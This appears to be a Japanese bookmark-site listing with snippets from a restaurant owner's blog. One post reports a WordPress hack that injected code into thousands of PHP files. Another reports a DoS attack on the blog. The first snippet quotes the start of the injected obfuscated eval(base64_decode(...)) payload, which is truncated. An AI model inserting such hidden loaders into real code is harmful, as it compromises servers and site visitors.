『WordPressの脆弱性を狙ったPHPコード不正書き換えについて』
佐渡の洋食屋店長のブログ佐渡の洋食屋店長のマニアックなブログです。 グルメネタは少なく、マニアックなネットTEC的なネタ、佐渡ネタが豊富なブログです。 WordPressの日本公式キャラのわぷー。 ピカチューっぽくてかわいいですよね。 ま、それは置いといて・・・いやぁ大変なクラッキング被害でした・・・。 WordPressを設置して、新しいバージョンに更新していないところから、WordPressのセキュリティの脆弱性を狙った攻撃を受けてしまいました。 被害は甚大でして・・・そのサーバー内にあるPHPスクリプトすべてに不正コードが埋め込まれました。そのファイルの数・・・6498ファイル。 不正に埋め込まれたコードはこちら。 eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0Ka
サーバ攻撃と軽く戦闘中です、の巻
日本の官庁、某掲示板、有名企業などにサーバ攻撃が行われたというニュースをけっこう目にしますが・・・・ このブログもDos攻撃を受けちゃいました〜 別にこんなブログ攻撃したって、社会的にまるで意味ないと思うのだが、 世の中には暇人もいるものだ。攻撃するならもっとほかに攻撃しがいがあるところがいっぱいあるっしょ。 具体的には2012/01/26 17:41 頃から 18:14頃の間に、とあるIPアドレスからおよそ36000回のアクセス。プログラムの起動数上限に達し、503エラーが発生。この30分くらいはほとんど接続できなくなった。この時にはサーバのあるさくらインターネットにすぐ電話して、異常を伝えてログの確保を依頼。Googleのアナリスティックスのリアルタイム分析では同時アクセス数30人くらいだったので、このときはほかの乗り合いサーバへのアクセスが多いのかと思ってました。 しかし、さくらの報
1
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
